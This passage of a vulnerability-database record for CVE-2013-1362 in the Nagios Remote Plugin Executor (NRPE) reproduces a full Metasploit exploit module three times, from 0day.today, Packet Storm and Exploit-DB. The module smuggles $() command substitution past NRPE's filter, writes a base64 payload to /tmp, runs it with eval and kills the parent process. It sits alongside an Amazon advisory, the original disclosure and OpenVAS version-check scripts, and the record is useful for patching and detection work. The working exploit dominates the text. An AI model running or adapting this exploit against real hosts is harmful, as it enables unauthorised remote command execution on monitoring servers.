populate the file with at least one line of text\r\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\r\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\r\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\r\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\r\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\r\n connect\r\n print_status(\"Sending request...\")\r\n send_message(command)\r\n disconnect\r\n end\r\n\r\n def check\r\n print_status(\"Checking if remote NRPE supports command line arguments\")\r\n\r\n begin\r\n # send query asking to run \"fake_check\" command with command substitution in arguments\r\n connect\r\n res = send_message(\"__fake_check!$()\")\r\n # if nrpe is configured to support arguments and is not patched to add $() to\r\n # NASTY_META_CHARS then the service will return:\r\n # NRPE: Command '__fake_check' not defined\r\n if res =~ /not defined/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n # Otherwise the service will close the connection if it is configured to disable arguments\r\n rescue EOFError => eof\r\n return Exploit::CheckCode::Safe\r\n rescue Errno::ECONNRESET => reset\r\n unless datastore['NRPESSL'] or @force_ssl\r\n print_status(\"Retrying with ADH SSL\")\r\n @force_ssl = true\r\n retry\r\n end\r\n return Exploit::CheckCode::Safe\r\n rescue => e\r\n return Exploit::CheckCode::Unknown\r\n end\r\n # TODO: patched version appears to go here\r\n return Exploit::CheckCode::Unknown\r\n\r\n end\r\n\r\n # NRPE uses unauthenticated Annonymous-Diffie-Hellman\r\n\r\n # setting the global SSL => true will break as we would be overlaying\r\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\r\n def connect(global = true, opts={})\r\n\r\n self.sock = super(global, opts)\r\n\r\n if datastore['NRPESSL'] or @force_ssl\r\n ctx = OpenSSL::SSL::SSLContext.new(\"TLSv1\")\r\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n ctx.ciphers = \"ADH\"\r\n\r\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\r\n\r\n @ssl_socket.connect\r\n\r\n self.sock.extend(Rex::Socket::SslTcp)\r\n self.sock.sslsock = @ssl_socket\r\n self.sock.sslctx = ctx\r\n end\r\n\r\n return self.sock\r\n end\r\n\r\n def disconnect\r\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\r\n super\r\n end\r\n\r\nend\n\n# 0day.today [2018-02-19] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20645"}], "amazon": [{"lastseen": "2018-10-02T16:55:17", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nIncomplete blacklist vulnerability in nrpc.c in Nagios Remote Plug-In Executor (NRPE) before 2.14 might allow remote attackers to execute arbitrary shell commands via \"$()\" shell metacharacters, which are processed by bash. \n\n \n**Affected Packages:** \n\n\nnrpe\n\n \n**Issue Correction:** \nRun _yum update nrpe_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n nagios-plugins-nrpe-2.14-3.5.amzn1.i686 \n nrpe-2.14-3.5.amzn1.i686 \n nrpe-debuginfo-2.14-3.5.amzn1.i686 \n \n src: \n nrpe-2.14-3.5.amzn1.src \n \n x86_64: \n nagios-plugins-nrpe-2.14-3.5.amzn1.x86_64 \n nrpe-2.14-3.5.amzn1.x86_64 \n nrpe-debuginfo-2.14-3.5.amzn1.x86_64 \n \n \n", "modified": "2014-09-15T23:31:00", "published": "2014-09-15T23:31:00", "id": "ALAS-2013-203", "href": "https://alas.aws.amazon.com/ALAS-2013-203.html", "title": "Important: nrpe", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:33", "bulletinFamily": "exploit", "description": "", "modified": "2013-04-12T00:00:00", "published": "2013-04-12T00:00:00", "href": "https://packetstormsecurity.com/files/121287/Nagios-Remote-Plugin-Executor-Arbitrary-Command-Execution.html", "id": "PACKETSTORM:121287", "type": "packetstorm", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n# \n \nrequire 'msf/core' \nrequire 'zlib' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution', \n'Description' => %q{ \nThe Nagios Remote Plugin Executor (NRPE) is installed to allow a central \nNagios server to actively poll information from the hosts it monitors. NRPE \nhas a configuration option dont_blame_nrpe which enables command-line arguments \nto be provided remote plugins. When this option is enabled, even when NRPE makes \nan effort to sanitize arguments to prevent command execution, it is possible to \nexecute arbitrary commands. \n}, \n'Author' => \n[ \n'Rudolph Pereir', # Vulnerability discovery \n'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-1362' ], \n[ 'OSVDB', '90582'], \n[ 'BID', '58142'], \n[ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability'] \n], \n'License' => MSF_LICENSE, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Payload' => \n{ \n'DisableNops' => true, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'perl python ruby bash telnet', \n# *_perl, *_python and *_ruby work if they are installed \n} \n}, \n'Targets' => \n[ \n[ 'Nagios Remote Plugin Executor prior to 2.14', {} ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Feb 21 2013' \n)) \n \nregister_options( \n[ \nOpt::RPORT(5666), \nOptEnum.new('NRPECMD', [ \ntrue, \n\"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\", \n'check_procs', \n['check_procs', 'check_users', 'check_load', 'check_disk'] \n]), \n# Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below \nOptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true]) \n], self.class) \nend \n \ndef send_message(message) \npacket = [ \n2, # packet version \n1, # packet type, 1 => query packet \n0, # checksum, to be added later \n0, # result code, discarded for query packet \nmessage, # the command and arguments \n0 # padding \n] \npacket[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum \nbegin \nself.sock.put(packet.pack(\"nnNna1024n\")) #send the packet \nres = self.sock.get_once # get the response \nrescue ::EOFError => eof \nres = \"\" \nend \n \nreturn res.unpack(\"nnNnA1024n\")[4] unless res.nil? \nend \n \ndef setup \n@ssl_socket = nil \n@force_ssl = false \nsuper \nend \n \ndef exploit \n \nif check != Exploit::CheckCode::Vulnerable \nfail_with(Exploit::Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\") \nend \n \nstage = \"setsid nohup #{payload.encoded} & \" \nstage = Rex::Text.encode_base64(stage) \n# NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :) \ncommand = datastore['NRPECMD'] \ncommand << \"!\" \ncommand << \"$($(rm -f /tmp/$$)\" # Delete the file if it exists \n# need a way to write to a file without using redirection (>) \n# cant count on perl being on all linux hosts, use GNU Sed \n# TODO: Probably a better way to do this, some hosts may not have a /tmp \ncommand << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text \ncommand << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file \ncommand << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage \ncommand << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right? \ncommand << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes \ncommand << \"$(rm -f /tmp/$$))\" # clean the file with the stage \nconnect \nprint_status(\"Sending request...\") \nsend_message(command) \ndisconnect \nend \n \ndef check \nprint_status(\"Checking if remote NRPE supports command line arguments\") \n \nbegin \n# send query asking to run \"fake_check\" command with command substitution in arguments \nconnect \nres = send_message(\"__fake_check!$()\") \n# if nrpe is configured to support arguments and is not patched to add $() to \n# NASTY_META_CHARS then the service will return: \n# NRPE: Command '__fake_check' not defined \nif res =~ /not defined/ \nreturn Exploit::CheckCode::Vulnerable \nend \n# Otherwise the service will close the connection if it is configured to disable arguments \nrescue EOFError => eof \nreturn Exploit::CheckCode::Safe \nrescue Errno::ECONNRESET => reset \nunless datastore['NRPESSL'] or @force_ssl \nprint_status(\"Retrying with ADH SSL\") \n@force_ssl = true \nretry \nend \nreturn Exploit::CheckCode::Safe \nrescue => e \nreturn Exploit::CheckCode::Unknown \nend \n# TODO: patched version appears to go here \nreturn Exploit::CheckCode::Unknown \n \nend \n \n# NRPE uses unauthenticated Annonymous-Diffie-Hellman \n \n# setting the global SSL => true will break as we would be overlaying \n# an SSLSocket on another SSLSocket which hasnt completed its handshake \ndef connect(global = true, opts={}) \n \nself.sock = super(global, opts) \n \nif datastore['NRPESSL'] or @force_ssl \nctx = OpenSSL::SSL::SSLContext.new(\"TLSv1\") \nctx.verify_mode = OpenSSL::SSL::VERIFY_NONE \nctx.ciphers = \"ADH\" \n \n@ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx) \n \n@ssl_socket.connect \n \nself.sock.extend(Rex::Socket::SslTcp) \nself.sock.sslsock = @ssl_socket \nself.sock.sslctx = ctx \nend \n \nreturn self.sock \nend \n \ndef disconnect \n@ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl \nsuper \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121287/nagios_nrpe_arguments.rb.txt"}, {"lastseen": "2016-12-05T22:18:29", "bulletinFamily": "exploit", "description": "", "modified": "2013-02-22T00:00:00", "published": "2013-02-22T00:00:00", "href": "https://packetstormsecurity.com/files/120507/Nagios-NRPE-2.13-Code-Execution.html", "id": "PACKETSTORM:120507", "type": "packetstorm", "title": "Nagios NRPE 2.13 Code Execution", "sourceData": "`Summary: \n--------------- \nCVE-ID: CVE-2013-1362 \nCVSS: Base Score 7.5 \nCVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:U/RL:OF/RC:UC/CDP:N/TD:N/CR:L/IR:L/AR:L \nVendor: Nagios \nAffected Products: NRPE \nAffected Platforms: All \nAffected versions: < 2.14 \nRemote Exploitable: Yes \nLocal Exploitable: No \nPatch Status Vendor released a patch (See Solution) \nURL: http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability \n \nDescription \n---------------- \nnrpe 2.13 has, in src/nrpc.c, line 52: \n \n#define NASTY_METACHARS \"|`&><'\\\"\\\\[]{};\" \n \nThis allows the passing of $() to plugins/scripts which, if run under \nbash, will execute that shell command under a subprocess and pass the \noutput as a parameter to the called script. Using this, it is possible \nto get called scripts, such as check_http, to execute arbitrary \ncommands under the uid that NRPE/nagios is running as (typically, \n'nagios'). \n \nSolution \n------------ \nUpgrade to NRPE 2.14 or later, available at \nhttp://sourceforge.net/projects/nagios/files/nrpe-2.x/ \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/120507/OSEC-2013-01.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T00:20:28", "bulletinFamily": "exploit", "description": "Nagios Remote Plugin Executor Arbitrary Command Execution. CVE-2013-1362. Remote exploit for linux platform", "modified": "2013-04-12T00:00:00", "published": "2013-04-12T00:00:00", "id": "EDB-ID:24955", "href": "https://www.exploit-db.com/exploits/24955/", "type": "exploitdb", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n#\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\r\n 'Description' => %q{\r\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\r\n Nagios server to actively poll information from the hosts it monitors. NRPE\r\n has a configuration option dont_blame_nrpe which enables command-line arguments\r\n to be provided remote plugins. When this option is enabled, even when NRPE makes\r\n an effort to sanitize arguments to prevent command execution, it is possible to\r\n execute arbitrary commands.\r\n },\r\n 'Author' =>\r\n [\r\n 'Rudolph Pereir', # Vulnerability discovery\r\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1362' ],\r\n [ 'OSVDB', '90582'],\r\n [ 'BID', '58142'],\r\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'perl python ruby bash telnet',\r\n # *_perl, *_python and *_ruby work if they are installed\r\n }\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Feb 21 2013'\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(5666),\r\n OptEnum.new('NRPECMD', [\r\n true,\r\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\r\n 'check_procs',\r\n ['check_procs', 'check_users', 'check_load', 'check_disk']\r\n ]),\r\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\r\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\r\n ], self.class)\r\n end\r\n\r\n def send_message(message)\r\n packet = [\r\n 2, # packet version\r\n 1, # packet type, 1 => query packet\r\n 0, # checksum, to be added later\r\n 0, # result code, discarded for query packet\r\n message, # the command and arguments\r\n 0 # padding\r\n ]\r\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\r\n begin\r\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\r\n res = self.sock.get_once # get the response\r\n rescue ::EOFError => eof\r\n res = \"\"\r\n end\r\n\r\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\r\n end\r\n\r\n def setup\r\n @ssl_socket = nil\r\n @force_ssl = false\r\n super\r\n end\r\n\r\n def exploit\r\n\r\n if check != Exploit::CheckCode::Vulnerable\r\n fail_with(Exploit::Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\r\n end\r\n\r\n stage = \"setsid nohup #{payload.encoded} & \"\r\n stage = Rex::Text.encode_base64(stage)\r\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\r\n command = datastore['NRPECMD']\r\n command << \"!\"\r\n command << \"$($(rm -f /tmp/$$)\" # Delete the file if it exists\r\n # need a way to write to a file without using redirection (>)\r\n # cant count on perl being on all linux hosts, use GNU Sed\r\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\r\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\r\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\r\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\r\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\r\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\r\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\r\n connect\r\n print_status(\"Sending request...\")\r\n send_message(command)\r\n disconnect\r\n end\r\n\r\n def check\r\n print_status(\"Checking if remote NRPE supports command line arguments\")\r\n\r\n begin\r\n # send query asking to run \"fake_check\" command with command substitution in arguments\r\n connect\r\n res = send_message(\"__fake_check!$()\")\r\n # if nrpe is configured to support arguments and is not patched to add $() to\r\n # NASTY_META_CHARS then the service will return:\r\n # NRPE: Command '__fake_check' not defined\r\n if res =~ /not defined/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n # Otherwise the service will close the connection if it is configured to disable arguments\r\n rescue EOFError => eof\r\n return Exploit::CheckCode::Safe\r\n rescue Errno::ECONNRESET => reset\r\n unless datastore['NRPESSL'] or @force_ssl\r\n print_status(\"Retrying with ADH SSL\")\r\n @force_ssl = true\r\n retry\r\n end\r\n return Exploit::CheckCode::Safe\r\n rescue => e\r\n return Exploit::CheckCode::Unknown\r\n end\r\n # TODO: patched version appears to go here\r\n return Exploit::CheckCode::Unknown\r\n\r\n end\r\n\r\n # NRPE uses unauthenticated Annonymous-Diffie-Hellman\r\n\r\n # setting the global SSL => true will break as we would be overlaying\r\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\r\n def connect(global = true, opts={})\r\n\r\n self.sock = super(global, opts)\r\n\r\n if datastore['NRPESSL'] or @force_ssl\r\n ctx = OpenSSL::SSL::SSLContext.new(\"TLSv1\")\r\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n ctx.ciphers = \"ADH\"\r\n\r\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\r\n\r\n @ssl_socket.connect\r\n\r\n self.sock.extend(Rex::Socket::SslTcp)\r\n self.sock.sslsock = @ssl_socket\r\n self.sock.sslctx = ctx\r\n end\r\n\r\n return self.sock\r\n end\r\n\r\n def disconnect\r\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\r\n super\r\n end\r\n\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24955/"}], "openvas": [{"lastseen": "2018-11-19T13:04:11", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2013-11-19T00:00:00", "id": "OPENVAS:1361412562310850457", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850457", "title": "SuSE Update for NRPE openSUSE-SU-2013:0621-1 (NRPE)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2013_0621_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for NRPE openSUSE-SU-2013:0621-1 (NRPE)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850457\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-19 14:05:45 +0530 (Tue, 19 Nov 2013)\");\n script_cve_id(\"CVE-2013-1362\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SuSE Update for NRPE openSUSE-SU-2013:0621-1 (NRPE)\");\n script_tag(name:\"affected\", value:\"NRPE on openSUSE 12.2, openSUSE 12.1\");\n script_tag(name:\"insight\", value:\"NRPE (the Nagios Remote Plug-In Executor) allows the\n passing of $() to plugins/scripts which, if run under bash,\n will execute that shell command under a subprocess and pass\n the output as a parameter to the called script. Using this,\n it is possible to get called scripts, such as check_http,\n to execute arbitrary commands under the uid that\n NRPE/nagios is running as (typically, 'nagios').\n\n With this update NRPE will deny remote requests containing\n a bash command substitution.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2013:0621_1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'NRPE'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE12\\.2|openSUSE12\\.1)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSE12.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe\", rpm:\"nagios-nrpe~2.12~30.9.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-debuginfo\", rpm:\"nagios-nrpe-debuginfo~2.12~30.9.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-debugsource\", rpm:\"nagios-nrpe-debugsource~2.12~30.9.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-doc\", rpm:\"nagios-nrpe-doc~2.12~30.9.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-plugins-nrpe\", rpm:\"nagios-plugins-nrpe~2.12~30.9.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-plugins-nrpe-debuginfo\", rpm:\"nagios-plugins-nrpe-debuginfo~2.12~30.9.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"openSUSE12.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe\", rpm:\"nagios-nrpe~2.12~27.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-debuginfo\", rpm:\"nagios-nrpe-debuginfo~2.12~27.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-debugsource\", rpm:\"nagios-nrpe-debugsource~2.12~27.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-doc\", rpm:\"nagios-nrpe-doc~2.12~27.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-plugins-nrpe\", rpm:\"nagios-plugins-nrpe~2.12~27.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-plugins-nrpe-debuginfo\", rpm:\"nagios-plugins-nrpe-debuginfo~2.12~27.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-24T11:09:52", "bulletinFamily": "scanner", "description": "Check for the Version of nrpe", "modified": "2018-01-24T00:00:00", "published": "2013-06-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=865756", "id": "OPENVAS:865756", "title": "Fedora Update for nrpe FEDORA-2013-9836", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nrpe FEDORA-2013-9836\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Nrpe is a system daemon that will execute various Nagios plugins\n locally on behalf of a remote (monitoring) host that uses the\n check_nrpe plugin. Various plugins that can be executed by the\n daemon are available at:\n http://sourceforge.net/projects/nagiosplug\n\n This package provides the core agent.\";\n\n\ntag_affected = \"nrpe on Fedora 17\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(865756);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-13 10:02:15 +0530 (Thu, 13 Jun 2013)\");\n script_cve_id(\"CVE-2013-1362\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for nrpe FEDORA-2013-9836\");\n\n script_xref(name: \"FEDORA\", value: \"2013-9836\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-June/108442.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of nrpe\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"nrpe\", rpm:\"nrpe~2.14~3.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-12T11:14:04", "bulletinFamily": "scanner", "description": "Check for the Version of NRPE", "modified": "2017-12-08T00:00:00", "published": "2013-11-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=850457", "id": "OPENVAS:850457", "title": "SuSE Update for NRPE openSUSE-SU-2013:0621-1 (NRPE)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2013_0621_1.nasl 8045 2017-12-08 08:39:37Z santu $\n#\n# SuSE Update for NRPE openSUSE-SU-2013:0621-1 (NRPE)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(850457);\n script_version(\"$Revision: 8045 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:39:37 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-19 14:05:45 